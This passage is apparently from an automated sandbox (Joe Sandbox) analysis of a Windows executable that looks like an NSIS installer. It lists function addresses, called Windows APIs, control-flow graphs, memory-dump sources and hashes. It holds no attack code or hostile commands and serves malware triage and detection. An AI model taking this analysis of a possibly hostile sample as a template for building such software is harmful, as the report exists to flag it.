                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                                                                                                                                                                                                                                              Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                              control_flow_graph 848 402b23-402b37 GlobalAlloc 849 402b39-402b49 call 401446 848->849 850 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 848->850 855 402b70-402b73 849->855 850->855 856 402b93 855->856 857 402b75-402b8d call 405f6a WriteFile 855->857 858 4030e3-4030f2 856->858 857->856 862 402384-40238d GlobalFree 857->862 862->858
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                              • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                                                                                                                                                              • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                                                                                                                                                                                                                                              Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                              control_flow_graph 865 402713-40273b call 406009 * 2 870 402746-402749 865->870 871 40273d-402743 call 40145c 865->871 873 402755-402758 870->873 874 40274b-402752 call 40145c 870->874 871->870 875 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 873->875 876 40275a-402761 call 40145c 873->876 874->873 876->875
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                              • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                                                                                                                                                                                                                                                                              • API String ID: 247603264-1827671502
                                                                                                                                                                                                                                                                                              • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                                                                                                                                                                              • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                                                                                                                                                                                                                                              Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                              • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                              • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                              • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                                              • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                                                                                                                                                                              • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                                                                                                                                                                                                                                              Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                                                                                                                                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                              • String ID: nsa
                                                                                                                                                                                                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                                              • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                                                                                                                                                                              • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                                                                                                                                                                                                                                              Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                              • String ID: HideWindow
                                                                                                                                                                                                                                                                                              • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                              • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                                                                                                                                              • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                                                                                                                                                                                                                              Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                              • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                                                                                                                                              • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                                                                                                                                                                                                                                              Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                              • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                                                                                                                                              • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                                                                                                                                                                                                                              Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                              • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                                                                                                                                                              • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                                                                                                                                                                                                                                              Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                              • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                                                                                                                                                              • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                                                                                                                                                                                                                                              Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
